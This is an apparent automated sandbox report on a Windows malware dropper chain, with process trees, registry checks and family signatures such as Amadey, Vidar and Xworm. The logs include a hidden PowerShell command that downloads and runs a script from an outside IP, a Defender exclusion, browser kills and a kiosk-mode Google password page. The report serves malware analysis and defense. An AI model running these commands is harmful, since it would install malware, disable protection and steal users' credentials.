PID 852 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe
PID 852 wrote to memory of 2068 N/A C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe C:\Windows\SysWOW64\WerFault.exe
PID 852 wrote to memory of 2068 N/A C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe C:\Windows\SysWOW64\WerFault.exe
PID 852 wrote to memory of 2068 N/A C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe C:\Windows\SysWOW64\WerFault.exe
PID 852 wrote to memory of 2068 N/A C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe C:\Windows\SysWOW64\WerFault.exe
PID 2780 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107610101\ce4pMzk.exe
PID 2780 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107610101\ce4pMzk.exe
PID 2780 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107610101\ce4pMzk.exe
PID 2780 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107610101\ce4pMzk.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe

"C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"

C:\Users\Admin\AppData\Local\Temp\10107540101\cnntXtU.exe

"C:\Users\Admin\AppData\Local\Temp\10107540101\cnntXtU.exe"

C:\Users\Admin\AppData\Local\Temp\10107550101\nhDLtPT.exe

"C:\Users\Admin\AppData\Local\Temp\10107550101\nhDLtPT.exe"

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"

C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe

"C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe"

C:\Users\Admin\AppData\Local\Temp\10107570101\Ps7WqSx.exe

"C:\Users\Admin\AppData\Local\Temp\10107570101\Ps7WqSx.exe"

C:\Windows\system32\taskeng.exe

taskeng.exe {30FCB4AD-7091-4EEA-9D54-B36AFCC25BC4} S-1-5-21-1846800975-3917212583-2893086201-1000:ZQABOPWE\Admin:Interactive:[1]

C:\ProgramData\kplnh\nvwjc.exe

C:\ProgramData\kplnh\nvwjc.exe

C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe

"C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe"

C:\Users\Admin\AppData\Local\Temp\10107590101\SvhQA35.exe

"C:\Users\Admin\AppData\Local\Temp\10107590101\SvhQA35.exe"

C:\Users\Admin\AppData\Local\Temp\onefile_1396_133856891568764000\chromium.exe

C:\Users\Admin\AppData\Local\Temp\10107590101\SvhQA35.exe

C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe

"C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe"

C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe

"C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 852 -s 500

C:\Users\Admin\AppData\Local\Temp\10107610101\ce4pMzk.exe

"C:\Users\Admin\AppData\Local\Temp\10107610101\ce4pMzk.exe"

C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe"

C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe"

C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe"

C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1548 -s 520

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1748 -s 1028

C:\Users\Admin\AppData\Local\Temp\10107630101\v6Oqdnc.exe

"C:\Users\Admin\AppData\Local\Temp\10107630101\v6Oqdnc.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2244 -s 1188

C:\Users\Admin\AppData\Local\Temp\10107640101\PcAIvJ0.exe

"C:\Users\Admin\AppData\Local\Temp\10107640101\PcAIvJ0.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\F90E.tmp\F90F.tmp\F910.bat C:\Users\Admin\AppData\Local\Temp\10107640101\PcAIvJ0.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"

C:\Users\Admin\AppData\Local\Temp\10107650101\zY9sqWs.exe

"C:\Users\Admin\AppData\Local\Temp\10107650101\zY9sqWs.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\QanWmXjd\Anubis.exe""

C:\Users\Admin\AppData\Local\Temp\10107660101\238042026f.exe

"C:\Users\Admin\AppData\Local\Temp\10107660101\238042026f.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1600 -s 1052

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1796 -s 1220

C:\Users\Admin\AppData\Local\Temp\10107670101\5e1228cb96.exe

"C:\Users\Admin\AppData\Local\Temp\10107670101\5e1228cb96.exe"

C:\Users\Admin\AppData\Local\Temp\10107680101\4694e79003.exe

"C:\Users\Admin\AppData\Local\Temp\10107680101\4694e79003.exe"

C:\Users\Admin\AppData\Local\Temp\10107680101\4694e79003.exe

"C:\Users\Admin\AppData\Local\Temp\10107680101\4694e79003.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1440 -s 512

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2408 -s 1020

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6f69758,0x7fef6f69768,0x7fef6f69778

C:\Windows\system32\ctfmon.exe

ctfmon.exe

C:\Users\Admin\AppData\Local\Temp\10107690101\7157e9ad9d.exe

"C:\Users\Admin\AppData\Local\Temp\10107690101\7157e9ad9d.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1160 --field-trial-handle=1376,i,7487762965322507259,14912296919046212898,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1508 --field-trial-handle=1376,i,7487762965322507259,14912296919046212898,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1572 --field-trial-handle=1376,i,7487762965322507259,14912296919046212898,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2224 --field-trial-handle=1376,i,7487762965322507259,14912296919046212898,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2256 --field-trial-handle=1376,i,7487762965322507259,14912296919046212898,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1944 --field-trial-handle=1376,i,7487762965322507259,14912296919046212898,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1336 --field-trial-handle=1376,i,7487762965322507259,14912296919046212898,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3416 --field-trial-handle=1376,i,7487762965322507259,14912296919046212898,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3528 --field-trial-handle=1376,i,7487762965322507259,14912296919046212898,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3740 --field-trial-handle=1376,i,7487762965322507259,14912296919046212898,131072 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\10107700101\0bb0c58326.exe

"C:\Users\Admin\AppData\Local\Temp\10107700101\0bb0c58326.exe"

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Users\Admin\AppData\Local\Temp\10107710101\a2d999341a.exe

"C:\Users\Admin\AppData\Local\Temp\10107710101\a2d999341a.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2208 -s 1200

C:\Users\Admin\AppData\Local\Temp\10107720101\2b862aa467.exe

"C:\Users\Admin\AppData\Local\Temp\10107720101\2b862aa467.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\2nop8" & exit

C:\Windows\SysWOW64\timeout.exe

timeout /t 11

C:\Users\Admin\AppData\Local\Temp\10107730101\8a07a872cb.exe

"C:\Users\Admin\AppData\Local\Temp\10107730101\8a07a872cb.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM firefox.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM chrome.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM msedge.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM opera.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM brave.exe /T

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="948.0.1296375672\1433213446" -parentBuildID 20221007134813 -prefsHandle 1132 -prefMapHandle 1124 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f483df3f-b1a4-4423-b49d-69e0062c0cc8} 948 "\\.\pipe\gecko-crash-server-pipe.948" 1316 101f0158 gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="948.1.256581804\1545010702" -parentBuildID 20221007134813 -prefsHandle 1552 -prefMapHandle 1548 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b5e4eda8-9824-4bfb-9ea5-043b9bf01f7c} 948 "\\.\pipe\gecko-crash-server-pipe.948" 1564 43eb558 socket

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="948.2.1412349720\247694493" -childID 1 -isForBrowser -prefsHandle 2076 -prefMapHandle 2072 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 596 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7a69bac0-4b15-49c6-aa05-a11402ae1fca} 948 "\\.\pipe\gecko-crash-server-pipe.948" 2088 1015f358 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="948.3.667336605\570302175" -childID 2 -isForBrowser -prefsHandle 2636 -prefMapHandle 2632 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 596 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {cebff203-e8dc-4de1-96ef-3c6e6d4f970b} 948 "\\.\pipe\gecko-crash-server-pipe.948" 2652 1cea4958 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="948.4.271526683\1969280333" -childID 3 -isForBrowser -prefsHandle 3864 -prefMapHandle 3860 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 596 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3abba5e3-6a00-4f35-ac60-e899e86a146e} 948 "\\.\pipe\gecko-crash-server-pipe.948" 3912 1fbb2a58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="948.5.678688496\1769326617" -childID 4 -isForBrowser -prefsHandle 4020 -prefMapHandle 4024 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 596 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3c9037f0-c1d0-4a33-80d8-a7360110c749} 948 "\\.\pipe\gecko-crash-server-pipe.948" 4008 1fcc7358 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="948.6.1788730289\2049257363" -childID 5 -isForBrowser -prefsHandle 4184 -prefMapHandle 4188 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 596 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3201214d-8736-4275-b124-7da9daf25f25} 948 "\\.\pipe\gecko-crash-server-pipe.948" 4172 1fcc7f58 tab

C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe

"C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe"

Network


Files


Analysis: behavioral2

Detonation Overview

Submitted

2025-03-05 22:58

Reported

2025-03-05 23:00

Platform

win10v2004-20250217-en

Max time kernel

138s

Max time network

150s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

Amadey family

amadey

Detect Vidar Stealer

stealer

Detect Xworm Payload


LiteHTTP

stealer bot litehttp

Litehttp family

litehttp

SystemBC

trojan systembc

Systembc family

systembc

Vidar

stealer vidar

Vidar family

vidar

Xmrig family

xmrig

Xworm

trojan rat xworm

Xworm family

xworm

xmrig

miner xmrig

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107630101\v6Oqdnc.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107670101\96dce6476e.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107690101\8f50b7e3b0.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107700101\6e33c98ed3.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\TempDZN9N3X1URJGLADPWM2EIKIOWBQVZRLP.EXE N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\ProgramData\dxukjxx\gmgc.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107660101\f6270156d1.exe N/A

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Boot or Logon Autostart Execution: Active Setup

persistence
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Microsoft\Active Setup\Installed Components C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Microsoft\Active Setup\Installed Components C:\Windows\explorer.exe N/A

.NET Reactor protector

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107670101\96dce6476e.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107630101\v6Oqdnc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107690101\8f50b7e3b0.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107700101\6e33c98ed3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\ProgramData\dxukjxx\gmgc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107630101\v6Oqdnc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107660101\f6270156d1.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107670101\96dce6476e.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107690101\8f50b7e3b0.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\TempDZN9N3X1URJGLADPWM2EIKIOWBQVZRLP.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107700101\6e33c98ed3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\TempDZN9N3X1URJGLADPWM2EIKIOWBQVZRLP.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\ProgramData\dxukjxx\gmgc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107660101\f6270156d1.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\10107640101\PcAIvJ0.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win_update.vbs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

